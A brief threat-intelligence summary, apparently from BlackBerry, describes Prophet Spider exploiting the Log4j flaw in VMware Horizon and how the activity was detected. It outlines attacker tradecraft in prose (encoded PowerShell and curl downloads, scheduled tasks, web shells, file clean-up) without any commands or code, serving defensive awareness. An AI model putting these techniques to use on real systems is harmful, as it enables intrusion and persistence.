Log4Shell and Coinminers

BlackBerry Research & Intelligence and Incident Response (IR) identified attacks from threat group, Prophet Spider, leveraging the Log4j vulnerability against the VMware Horizon platform. Attacks associated with the vulnerability were identified largely from monitoring child processes associated with ws_TomcatService.exe, leading to the execution of scripting interpreters for Powershell or cmd. Following post-exploitation, additional tools could be downloaded with PowerShell via encoded commands or invoke-expression, or from curl. To maintain persistence, scheduled tasks were created along with web shells. Lastly, clean-up of files was also observed to remove indicators.